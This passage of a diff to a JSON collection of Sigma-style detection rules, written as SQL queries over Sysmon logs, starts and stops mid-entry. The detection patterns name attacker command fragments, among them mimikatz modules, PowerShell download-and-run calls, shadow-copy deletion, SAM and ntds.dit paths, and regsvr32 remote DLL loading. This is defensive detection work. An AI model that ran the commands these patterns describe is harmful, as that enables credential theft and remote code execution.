Child Process", + "id": "52cad028-0ff0-4854-8f67-d25dfcbc78b4", "status": "test", - "description": "Detects suspicious inline VBScript keywords as used by UNC2452", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects a suspicious child process of a Microsoft HTML Help (HH.exe)", + "author": "Maxim Pavlunin, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.defense_evasion", + "attack.execution", + "attack.initial_access", + "attack.t1047", + "attack.t1059.001", + "attack.t1059.003", + "attack.t1059.005", + "attack.t1059.007", + "attack.t1218", + "attack.t1218.001", + "attack.t1218.010", + "attack.t1218.011", + "attack.t1566", + "attack.t1566.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%Execute%' ESCAPE '\\' AND CommandLine LIKE '%CreateObject%' ESCAPE '\\' AND CommandLine LIKE '%RegRead%' ESCAPE '\\' AND CommandLine LIKE '%window.close%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion%' ESCAPE '\\') AND NOT (CommandLine LIKE '%\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\hh.exe' ESCAPE '\\' AND (Image LIKE '%\\\\CertReq.exe' ESCAPE '\\' OR Image LIKE '%\\\\CertUtil.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\installutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\MSbuild.exe' ESCAPE '\\' OR Image LIKE '%\\\\MSHTA.EXE' ESCAPE '\\' OR Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_unc2452_vbscript_pattern.yml" + "filename": "proc_creation_win_hh_html_help_susp_child_process.yml" }, { - "title": "Delete Important Scheduled Task", - "id": "dbc1f800-0fe0-4bc0-9c66-292c2abe3f78", + "title": "UAC Bypass Using IDiagnostic Profile", + "id": "4cbef972-f347-4170-b62a-8253f6168e6d", "status": "experimental", - "description": "Detects when adversaries stop services or processes by deleting their respective scheduled tasks in order to conduct data destructive activities", + "description": "Detects the \"IDiagnosticProfileUAC\" UAC bypass technique", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1489" + "attack.execution", + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/delete%' ESCAPE '\\' AND CommandLine LIKE '%/tn%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\Windows\\\\SystemRestore\\\\SR%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Windows Defender\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\BitLocker%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\WindowsBackup\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\WindowsUpdate\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\UpdateOrchestrator\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\ExploitGuard%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\DllHost.exe' ESCAPE '\\' AND ParentCommandLine LIKE '% /Processid:{12C21EA7-2EB8-4B55-9249-AC243DA8C666}%' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" ], - "filename": "proc_creation_win_schtasks_delete.yml" + "filename": "proc_creation_win_uac_bypass_idiagnostic_profile.yml" }, { - "title": "Process Dumping Via Comsvcs.DLL", - "id": "646ea171-dded-4578-8a4d-65e9822892e3", + "title": "Suspicious SYSTEM User Process Creation", + "id": "2617e7ed-adb7-40ba-b0f3-8f9945fe6c09", "status": "test", - "description": "Detects a process memory dump via \"comsvcs.dll\" using rundll32, covering multiple different techniques (ordinal, minidump function, etc.)", - "author": "Florian Roth (Nextron Systems), Modexp, Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.defense_evasion", - "attack.credential_access", - "attack.t1036", - "attack.t1003.001", - "car.2013-05-009" - ], + "description": "Detects a suspicious process creation as SYSTEM user (suspicious program or command line parameter)", + "author": "Florian Roth (Nextron Systems), David ANDRE (additional keywords)", "falsepositives": [ - "Unlikely, because no one should dump the process memory in that way" + "Administrative activity", + "Scripts and administrative tools used in the monitored environment", + "Monitoring activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE' OR CommandLine LIKE '%rundll32%' ESCAPE '\\') AND (CommandLine LIKE '%comsvcs%' ESCAPE '\\' AND CommandLine LIKE '%full%' ESCAPE '\\' AND (CommandLine LIKE '%24 %' ESCAPE '\\' OR CommandLine LIKE '%#24%' ESCAPE '\\' OR CommandLine LIKE '%#+24%' ESCAPE '\\' OR CommandLine LIKE '%MiniDump%' ESCAPE '\\'))) OR CommandLine LIKE '%#-4294967272%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((IntegrityLevel = 'System' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')) AND ((Image LIKE '%\\\\calc.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR Image LIKE '%\\\\ping.exe' ESCAPE '\\') OR (CommandLine LIKE '% -NoP %' ESCAPE '\\' OR CommandLine LIKE '% -W Hidden %' ESCAPE '\\' OR CommandLine LIKE '% -decode %' ESCAPE '\\' OR CommandLine LIKE '% /decode %' ESCAPE '\\' OR CommandLine LIKE '% /urlcache %' ESCAPE '\\' OR CommandLine LIKE '% -urlcache %' ESCAPE '\\' OR CommandLine LIKE '% -e% JAB%' ESCAPE '\\' OR CommandLine LIKE '% -e% SUVYI%' ESCAPE '\\' OR CommandLine LIKE '% -e% SQBFAFgA%' ESCAPE '\\' OR CommandLine LIKE '% -e% aWV4I%' ESCAPE '\\' OR CommandLine LIKE '% -e% IAB%' ESCAPE '\\' OR CommandLine LIKE '% -e% PAA%' ESCAPE '\\' OR CommandLine LIKE '% -e% aQBlAHgA%' ESCAPE '\\' OR CommandLine LIKE '%vssadmin delete shadows%' ESCAPE '\\' OR CommandLine LIKE '%reg SAVE HKLM%' ESCAPE '\\' OR CommandLine LIKE '% -ma %' ESCAPE '\\' OR CommandLine LIKE '%Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\' OR CommandLine LIKE '%.downloadstring(%' ESCAPE '\\' OR CommandLine LIKE '%.downloadfile(%' ESCAPE '\\' OR CommandLine LIKE '% /ticket:%' ESCAPE '\\' OR CommandLine LIKE '%dpapi::%' ESCAPE '\\' OR CommandLine LIKE '%event::clear%' ESCAPE '\\' OR CommandLine LIKE '%event::drop%' ESCAPE '\\' OR CommandLine LIKE '%id::modify%' ESCAPE '\\' OR CommandLine LIKE '%kerberos::%' ESCAPE '\\' OR CommandLine LIKE '%lsadump::%' ESCAPE '\\' OR CommandLine LIKE '%misc::%' ESCAPE '\\' OR CommandLine LIKE '%privilege::%' ESCAPE '\\' OR CommandLine LIKE '%rpc::%' ESCAPE '\\' OR CommandLine LIKE '%sekurlsa::%' ESCAPE '\\' OR CommandLine LIKE '%sid::%' ESCAPE '\\' OR CommandLine LIKE '%token::%' ESCAPE '\\' OR CommandLine LIKE '%vault::cred%' ESCAPE '\\' OR CommandLine LIKE '%vault::list%' ESCAPE '\\' OR CommandLine LIKE '% p::d %' ESCAPE '\\' OR CommandLine LIKE '%;iex(%' ESCAPE '\\' OR CommandLine LIKE '%MiniDump%' ESCAPE '\\' OR CommandLine LIKE '%net user %' ESCAPE '\\'))) AND NOT ((CommandLine = 'ping 127.0.0.1 -n 5') OR (Image LIKE '%\\\\PING.EXE' ESCAPE '\\' AND ParentCommandLine LIKE '%\\\\DismFoDInstall.cmd%' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\Packages\\\\Plugins\\\\Microsoft.GuestConfiguration.ConfigurationforWindows\\\\%' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\Program Files (x86)\\\\Java\\\\%' ESCAPE '\\' AND ParentImage LIKE '%\\\\bin\\\\javaws.exe' ESCAPE '\\' AND Image LIKE 'C:\\\\Program Files (x86)\\\\Java\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\bin\\\\jp2launcher.exe' ESCAPE '\\' AND CommandLine LIKE '% -ma %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_rundll32_process_dump_via_comsvcs.yml" + "filename": "proc_creation_win_susp_system_user_anomaly.yml" }, { - "title": "Execution Of Non-Existing File", - "id": "71158e3f-df67-472b-930e-7d287acaa3e1", - "status": "experimental", - "description": "Checks whether the image specified in a process creation event is not a full, absolute path (caused by process ghosting or other unorthodox methods to start a process)", - "author": "Max Altgelt (Nextron Systems)", + "title": "Execution via Diskshadow.exe", + "id": "0c2f8629-7129-4a8a-9897-7e0768f13ff2", + "status": "test", + "description": "Detects using Diskshadow.exe to execute arbitrary code in text file", + "author": "Ivan Dyachkov, oscd.community", "tags": [ - "attack.defense_evasion" + "attack.execution", + "attack.t1218" ], "falsepositives": [ - "Unknown" + "False postitve can be if administrators use diskshadow tool in their infrastructure as a main backup tool with scripts." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND NOT (Image LIKE '%\\\\%' ESCAPE '\\') AND NOT ((Image = '') OR (Image IN ('-', '')) OR (Image IN ('System', 'Registry', 'MemCompression', 'vmmem') OR CommandLine IN ('Registry', 'MemCompression', 'vmmem'))))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\diskshadow.exe' ESCAPE '\\' AND (CommandLine LIKE '%/s%' ESCAPE '\\' OR CommandLine LIKE '%-s%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_image_missing.yml" + "filename": "proc_creation_win_lolbin_diskshadow.yml" }, { - "title": "HH.EXE Execution", - "id": "68c8acb4-1b60-4890-8e82-3ddf7a6dba84", + "title": "PUA - Ngrok Execution", + "id": "ee37eb7c-a4e7-4cd5-8fa4-efa27f1c3f31", "status": "test", - "description": "Detects the usage of \"hh.exe\" executing recently modified .chm files.", - "author": "E.M. Anhaus (originally from Atomic Blue Detections, Dan Beavin), oscd.community", + "description": "Detects the use of Ngrok, a utility used for port forwarding and tunneling, often used by threat actors to make local protected services publicly available.\nInvolved domains are bin.equinox.io for download and *.ngrok.io for connections.\n", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218.001" + "attack.command_and_control", + "attack.t1572" ], "falsepositives": [ - "Unlikely" + "Another tool that uses the command line switches of Ngrok", + "Ngrok http 3978 (https://docs.microsoft.com/en-us/azure/bot-service/bot-service-debug-channel-ngrok?view=azure-bot-service-4.0)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\hh.exe' ESCAPE '\\' AND CommandLine LIKE '%.chm%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '% tcp 139%' ESCAPE '\\' OR CommandLine LIKE '% tcp 445%' ESCAPE '\\' OR CommandLine LIKE '% tcp 3389%' ESCAPE '\\' OR CommandLine LIKE '% tcp 5985%' ESCAPE '\\' OR CommandLine LIKE '% tcp 5986%' ESCAPE '\\') OR (CommandLine LIKE '% start %' ESCAPE '\\' AND CommandLine LIKE '%--all%' ESCAPE '\\' AND CommandLine LIKE '%--config%' ESCAPE '\\' AND CommandLine LIKE '%.yml%' ESCAPE '\\') OR (Image LIKE '%ngrok.exe' ESCAPE '\\' AND (CommandLine LIKE '% tcp %' ESCAPE '\\' OR CommandLine LIKE '% http %' ESCAPE '\\' OR CommandLine LIKE '% authtoken %' ESCAPE '\\')) OR (CommandLine LIKE '%.exe authtoken %' ESCAPE '\\' OR CommandLine LIKE '%.exe start --all%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hh_chm_execution.yml" + "filename": "proc_creation_win_pua_ngrok.yml" }, { - "title": "Non-privileged Usage of Reg or Powershell", - "id": "8f02c935-effe-45b3-8fc9-ef8696a9e41d", + "title": "Suspicious Control Panel DLL Load", + "id": "d7eb979b-c2b5-4a6f-a3a7-c87ce6763819", "status": "test", - "description": "Search for usage of reg or Powershell by non-privileged users to modify service configuration in registry", - "author": "Teymur Kheirkhabarov (idea), Ryan Plas (rule), oscd.community", + "description": "Detects suspicious Rundll32 execution from control.exe as used by Equation Group and Exploit Kits", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1112" + "attack.t1218.011" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%reg %' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\') OR (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%set-itemproperty%' ESCAPE '\\' OR CommandLine LIKE '% sp %' ESCAPE '\\' OR CommandLine LIKE '%new-itemproperty%' ESCAPE '\\')) AND (IntegrityLevel = 'Medium' AND CommandLine LIKE '%ControlSet%' ESCAPE '\\' AND CommandLine LIKE '%Services%' ESCAPE '\\' AND (CommandLine LIKE '%ImagePath%' ESCAPE '\\' OR CommandLine LIKE '%FailureCommand%' ESCAPE '\\' OR CommandLine LIKE '%ServiceDLL%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\System32\\\\control.exe' ESCAPE '\\' AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE')) AND NOT (CommandLine LIKE '%Shell32.dll%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_non_priv_reg_or_ps.yml" + "filename": "proc_creation_win_rundll32_susp_control_dll_load.yml" }, { - "title": "Suspicious Regsvr32 HTTP IP Pattern", - "id": "2dd2c217-bf68-437a-b57c-fe9fd01d5de8", + "title": "Delete Important Scheduled Task", + "id": "dbc1f800-0fe0-4bc0-9c66-292c2abe3f78", "status": "experimental", - "description": "Detects a certain command line flag combination used by regsvr32 when used to download and register a DLL from a remote address which uses HTTP (not HTTPS) and a IP address and not FQDN", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects when adversaries stop services or processes by deleting their respective scheduled tasks in order to conduct data destructive activities", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218.010" + "attack.impact", + "attack.t1489" ], "falsepositives": [ - "FQDNs that start with a number" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '% /s%' ESCAPE '\\' AND CommandLine LIKE '% /u%' ESCAPE '\\' AND (CommandLine LIKE '% /i:http://1%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://2%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://3%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://4%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://5%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://6%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://7%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://8%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://9%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://1%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://2%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://3%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://4%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://5%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://6%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://7%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://8%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://9%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/delete%' ESCAPE '\\' AND CommandLine LIKE '%/tn%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\Windows\\\\SystemRestore\\\\SR%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Windows Defender\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\BitLocker%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\WindowsBackup\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\WindowsUpdate\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\UpdateOrchestrator\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\ExploitGuard%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_regsvr32_http_pattern.yml" + "filename": "proc_creation_win_schtasks_delete.yml" }, { - "title": "Potential Unquoted Service Path Reconnaissance Via Wmic.EXE", - "id": "68bcd73b-37ef-49cb-95fc-edc809730be6", - "status": "experimental", - "description": "Detects known WMI recon method to look for unquoted service paths using wmic. Often used by pentester and attacker enumeration scripts", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Turla Group Commands May 2020", + "id": "9e2e51c5-c699-4794-ba5a-29f5da40ac0c", + "status": "test", + "description": "Detects commands used by Turla group as reported by ESET in May 2020", + "author": "Florian Roth (Nextron Systems)", "tags": [ + "attack.g0010", "attack.execution", - "attack.t1047" + "attack.t1059.001", + "attack.t1053.005", + "attack.t1027" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'wmic.exe' OR Image LIKE '%\\\\WMIC.exe' ESCAPE '\\') AND (CommandLine LIKE '% service get %' ESCAPE '\\' AND CommandLine LIKE '%name,displayname,pathname,startmode%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%tracert -h 10 yahoo.com%' ESCAPE '\\' OR CommandLine LIKE '%.WSqmCons))|iex;%' ESCAPE '\\' OR CommandLine LIKE '%Fr`omBa`se6`4Str`ing%' ESCAPE '\\') OR (CommandLine LIKE '%net use https://docs.live.net%' ESCAPE '\\' AND CommandLine LIKE '%@aol.co.uk%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_wmic_recon_unquoted_service_search.yml" + "filename": "proc_creation_win_apt_turla_comrat_may20.yml" }, { - "title": "Sysmon Driver Unloaded Via Fltmc.EXE", - "id": "4d7cda18-1b12-4e52-b45c-d28653210df8", - "status": "test", - "description": "Detects possible Sysmon filter driver unloaded via fltmc.exe", - "author": "Kirill Kiryanov, oscd.community", + "title": "Rundll32 UNC Path Execution", + "id": "5cdb711b-5740-4fb2-ba88-f7945027afac", + "status": "experimental", + "description": "Detects rundll32 execution where the DLL is located on a remote location (share)", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1070", - "attack.t1562", - "attack.t1562.002" + "attack.execution", + "attack.t1021.002", + "attack.t1218.011" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\fltMC.exe' ESCAPE '\\' OR OriginalFileName = 'fltMC.exe') AND (CommandLine LIKE '%unload%' ESCAPE '\\' AND CommandLine LIKE '%sysmon%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE' OR CommandLine LIKE '%rundll32%' ESCAPE '\\') AND CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\')" ], - "filename": "proc_creation_win_fltmc_unload_driver_sysmon.yml" + "filename": "proc_creation_win_rundll32_unc_path.yml" }, { - "title": "Regsvr32 Flags Anomaly", - "id": "b236190c-1c61-41e9-84b3-3fe03f6d76b0", + "title": "Copying Sensitive Files with Credential Data", + "id": "e7be6119-fc37-43f0-ad4f-1f3f99be2f9f", "status": "test", - "description": "Detects a flag anomaly in which regsvr32.exe uses a /i flag without using a /n flag at the same time", - "author": "Florian Roth (Nextron Systems)", + "description": "Files with well-known filenames (sensitive files with credential data) copying", + "author": "Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1218.010" + "attack.credential_access", + "attack.t1003.002", + "attack.t1003.003", + "car.2013-07-001", + "attack.s0404" ], "falsepositives": [ - "Unknown" + "Copying sensitive files for legitimate use (eg. backup) or forensic investigation by legitimate incident responder or forensic invetigator" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND CommandLine LIKE '% /i:%' ESCAPE '\\') AND NOT (CommandLine LIKE '% /n %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\esentutl.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\esentutl.exe' ESCAPE '\\') AND (CommandLine LIKE '%vss%' ESCAPE '\\' OR CommandLine LIKE '% /m %' ESCAPE '\\' OR CommandLine LIKE '% /y %' ESCAPE '\\')) OR (CommandLine LIKE '%\\\\windows\\\\ntds\\\\ntds.dit%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\sam%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\security%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\system %' ESCAPE '\\' OR CommandLine LIKE '%\\\\repair\\\\sam%' ESCAPE '\\' OR CommandLine LIKE '%\\\\repair\\\\system%' ESCAPE '\\' OR CommandLine LIKE '%\\\\repair\\\\security%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\RegBack\\\\sam%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\RegBack\\\\system%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\RegBack\\\\security%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_regsvr32_flags_anomaly.yml" + "filename": "proc_creation_win_esentutl_sensitive_file_copy.yml" }, { - "title": "Suspicious PowerShell Parameter Substring", - "id": "36210e0d-5b19-485d-a087-c096088885f0", - "status": "test", - "description": "Detects suspicious PowerShell invocation with a parameter substring", - "author": "Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix)", + "title": "Renamed PsExec Service Execution", + "id": "51ae86a2-e2e1-4097-ad85-c46cb6851de4", + "status": "experimental", + "description": "Detects suspicious launch of a renamed version of the PSEXESVC service with, which is not often used by legitimate administrators", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.execution" ], "falsepositives": [ - "Unknown" + "Legitimate administrative tasks" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '% -windowstyle h %' ESCAPE '\\' OR CommandLine LIKE '% -windowstyl h%' ESCAPE '\\' OR CommandLine LIKE '% -windowsty h%' ESCAPE '\\' OR CommandLine LIKE '% -windowst h%' ESCAPE '\\' OR CommandLine LIKE '% -windows h%' ESCAPE '\\' OR CommandLine LIKE '% -windo h%' ESCAPE '\\' OR CommandLine LIKE '% -wind h%' ESCAPE '\\' OR CommandLine LIKE '% -win h%' ESCAPE '\\' OR CommandLine LIKE '% -wi h%' ESCAPE '\\' OR CommandLine LIKE '% -win h %' ESCAPE '\\' OR CommandLine LIKE '% -win hi %' ESCAPE '\\' OR CommandLine LIKE '% -win hid %' ESCAPE '\\' OR CommandLine LIKE '% -win hidd %' ESCAPE '\\' OR CommandLine LIKE '% -win hidde %' ESCAPE '\\' OR CommandLine LIKE '% -NoPr %' ESCAPE '\\' OR CommandLine LIKE '% -NoPro %' ESCAPE '\\' OR CommandLine LIKE '% -NoProf %' ESCAPE '\\' OR CommandLine LIKE '% -NoProfi %' ESCAPE '\\' OR CommandLine LIKE '% -NoProfil %' ESCAPE '\\' OR CommandLine LIKE '% -nonin %' ESCAPE '\\' OR CommandLine LIKE '% -nonint %' ESCAPE '\\' OR CommandLine LIKE '% -noninte %' ESCAPE '\\' OR CommandLine LIKE '% -noninter %' ESCAPE '\\' OR CommandLine LIKE '% -nonintera %' ESCAPE '\\' OR CommandLine LIKE '% -noninterac %' ESCAPE '\\' OR CommandLine LIKE '% -noninteract %' ESCAPE '\\' OR CommandLine LIKE '% -noninteracti %' ESCAPE '\\' OR CommandLine LIKE '% -noninteractiv %' ESCAPE '\\' OR CommandLine LIKE '% -ec %' ESCAPE '\\' OR CommandLine LIKE '% -encodedComman %' ESCAPE '\\' OR CommandLine LIKE '% -encodedComma %' ESCAPE '\\' OR CommandLine LIKE '% -encodedComm %' ESCAPE '\\' OR CommandLine LIKE '% -encodedCom %' ESCAPE '\\' OR CommandLine LIKE '% -encodedCo %' ESCAPE '\\' OR CommandLine LIKE '% -encodedC %' ESCAPE '\\' OR CommandLine LIKE '% -encoded %' ESCAPE '\\' OR CommandLine LIKE '% -encode %' ESCAPE '\\' OR CommandLine LIKE '% -encod %' ESCAPE '\\' OR CommandLine LIKE '% -enco %' ESCAPE '\\' OR CommandLine LIKE '% -en %' ESCAPE '\\' OR CommandLine LIKE '% -executionpolic %' ESCAPE '\\' OR CommandLine LIKE '% -executionpoli %' ESCAPE '\\' OR CommandLine LIKE '% -executionpol %' ESCAPE '\\' OR CommandLine LIKE '% -executionpo %' ESCAPE '\\' OR CommandLine LIKE '% -executionp %' ESCAPE '\\' OR CommandLine LIKE '% -execution bypass%' ESCAPE '\\' OR CommandLine LIKE '% -executio bypass%' ESCAPE '\\' OR CommandLine LIKE '% -executi bypass%' ESCAPE '\\' OR CommandLine LIKE '% -execut bypass%' ESCAPE '\\' OR CommandLine LIKE '% -execu bypass%' ESCAPE '\\' OR CommandLine LIKE '% -exec bypass%' ESCAPE '\\' OR CommandLine LIKE '% -exe bypass%' ESCAPE '\\' OR CommandLine LIKE '% -ex bypass%' ESCAPE '\\' OR CommandLine LIKE '% -ep bypass%' ESCAPE '\\' OR CommandLine LIKE '% /windowstyle h %' ESCAPE '\\' OR CommandLine LIKE '% /windowstyl h%' ESCAPE '\\' OR CommandLine LIKE '% /windowsty h%' ESCAPE '\\' OR CommandLine LIKE '% /windowst h%' ESCAPE '\\' OR CommandLine LIKE '% /windows h%' ESCAPE '\\' OR CommandLine LIKE '% /windo h%' ESCAPE '\\' OR CommandLine LIKE '% /wind h%' ESCAPE '\\' OR CommandLine LIKE '% /win h%' ESCAPE '\\' OR CommandLine LIKE '% /wi h%' ESCAPE '\\' OR CommandLine LIKE '% /win h %' ESCAPE '\\' OR CommandLine LIKE '% /win hi %' ESCAPE '\\' OR CommandLine LIKE '% /win hid %' ESCAPE '\\' OR CommandLine LIKE '% /win hidd %' ESCAPE '\\' OR CommandLine LIKE '% /win hidde %' ESCAPE '\\' OR CommandLine LIKE '% /NoPr %' ESCAPE '\\' OR CommandLine LIKE '% /NoPro %' ESCAPE '\\' OR CommandLine LIKE '% /NoProf %' ESCAPE '\\' OR CommandLine LIKE '% /NoProfi %' ESCAPE '\\' OR CommandLine LIKE '% /NoProfil %' ESCAPE '\\' OR CommandLine LIKE '% /nonin %' ESCAPE 